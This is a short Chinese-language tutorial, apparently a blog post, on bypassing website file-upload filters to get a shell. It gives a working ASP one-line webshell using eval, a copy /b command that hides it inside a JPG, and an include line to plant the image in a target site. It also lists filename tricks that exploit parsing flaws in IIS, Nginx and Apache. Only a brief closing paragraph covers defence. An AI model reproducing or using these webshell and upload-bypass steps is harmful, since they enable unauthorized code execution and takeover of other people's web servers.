天天看點

突破檔案上傳漏洞

1.利用圖檔捆綁木馬,繞過檔案類型判斷

有些網站我們在拿shell的時候,會要用到上傳檔案,但是有的時候都會有過濾,如果隻是上傳.asp .php結尾的檔案的話系統是不會給你上傳的,那麼這個時候我們通常會把一句話放在圖檔裡面,寫成1.asp;.jpg 1.asp;jpg的格式上傳上去,這樣上傳的時候系統檢測是圖檔,然後在上傳之後,會把這個檔案當asp檔案來處理,那麼如何用cmd來制作一句話木馬呢.

利用copy指令

詳細操作為

1.随便找一張圖檔 名字改成1.jpg(名字改為1.jpg隻是為了友善記憶和輸入 檔案的字尾随意 隻要是圖檔的格式就可以了)

2.<%eval request("keio")%>           存為1.asp(就是一句話木馬)

3.copy 1.jpg /b + 1.asp /a  2.jpg      存為1.bat檔案

解釋一下代碼

複制目前目錄下的 1.jpg 圖檔和目前目錄下的 1.asp 檔案并以ASCII代碼的方式合并為 2.jpg 圖檔

運作 1.bat 就會出現一個圖檔 2.jpg

而這個2.jpg就是已經做好的木馬了

把一句話木馬合并到了圖檔裡以後

再把以下代碼插入目标網站的任意檔案即可

<% #include files="2.jpg"%>

防禦方法:主要是防止iis将圖檔解析成asp,aspx,php等進行執行,圖檔馬是配合解析漏洞或者檔案包含才能正常執行,iis之前版本存在解析漏洞

IS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg

IIS 7.0/IIS 7.5/ Nginx <8.03 畸形解析 1.jpg/.php

Nginx <8.03 空位元組代碼執行漏洞 1.jpg%00.php

Apache 解析漏洞 .php.一個無效字尾

還有就是 Windows 下的各種截斷了,因為 win 環境下不允許一些符号命名檔案,是以可以造成截斷檔案名的效果